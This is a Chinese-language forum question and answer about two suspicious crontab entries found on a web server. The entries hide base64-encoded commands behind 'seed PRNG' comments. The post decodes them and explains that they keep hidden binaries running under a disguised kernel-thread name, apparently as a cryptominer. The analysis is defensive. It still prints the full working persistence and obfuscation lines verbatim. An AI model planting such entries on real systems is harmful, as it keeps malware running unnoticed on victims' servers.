我在 cron 调度程序中发现了 2 个字符串:
# DO NOT REMOVE THIS LINE. SEED PRNG. #defunct-kernel
0 * * * * { echo L3Vzci9iaW4vcGtpbGwgLTAgLVUxMDEwIGRlZnVuY3QgMj4vZGV2L251bGwgfHwgU0hFTEw9IFRFUk09eHRlcm0tMjU2Y29sb3IgR1NfQVJHUz0iLWsgL3Zhci93d3cvd3d3LXJvb3QvZGF0YS8uY29uZmlnL2h0b3AvZGVmdW5jdC5kYXQgLWxpcUQiIC91c3IvYmluL2Jhc2ggLWMgImV4ZWMgLWEgJ1trYWx1YWRdJyAnL3Zhci93d3cvd3d3LXJvb3QvZGF0YS8uY29uZmlnL2h0b3AvZGVmdW5jdCciIDI+L2Rldi9udWxsCg==|base64 -d|bash;} 2>/dev/null #1b5b324a50524e47 >/dev/random # seed prng defunct-kernel
# DO NOT REMOVE THIS LINE. SEED PRNG. #core-kernel
0 * * * * { echo L3Vzci9iaW4vcGtpbGwgLTAgLVUxMDEwIGNvcmUgMj4vZGV2L251bGwgfHwgJy92YXIvd3d3L3d3dy1yb290L2RhdGEvLmNvbmZpZy9odG9wL2NvcmUnIDI+L2Rldi9udWxsCg==|base64 -d|bash;} 2>/dev/null #1b5b324a50524e47 >/dev/random # seed prng core-kernel
Base64 解码的子字符串为:
/usr/bin/pkill -0 -U1010 defunct 2>/dev/null || SHELL= TERM=xterm-256color GS_ARGS="-k /var/www/www-root/data/.config/htop/defunct.dat -liqD" /usr/bin/bash -c "exec -a '[kaluad]' '/var/www/www-root/data/.config/htop/defunct'" 2>/dev/null
/usr/bin/pkill -0 -U1010 core 2>/dev/null || '/var/www/www-root/data/.config/htop/core' 2>/dev/null
请解释一下这些命令的作用?
他们不断尝试启动程序
/var/www/www-root/data/.config/htop/core,/var/www/www-root/data/.config/htop/defunct看看这些程序是否尚未运行(带有 0 信号的 pkill 用于测试进程是否已在运行)。前者还使用 exec 将进程名称伪装为“[kaluad]”(使其看起来像内核线程)。两者看起来都相当标准“你的网络服务器感染了加密货币矿工,谁知道还有什么”cron 作业。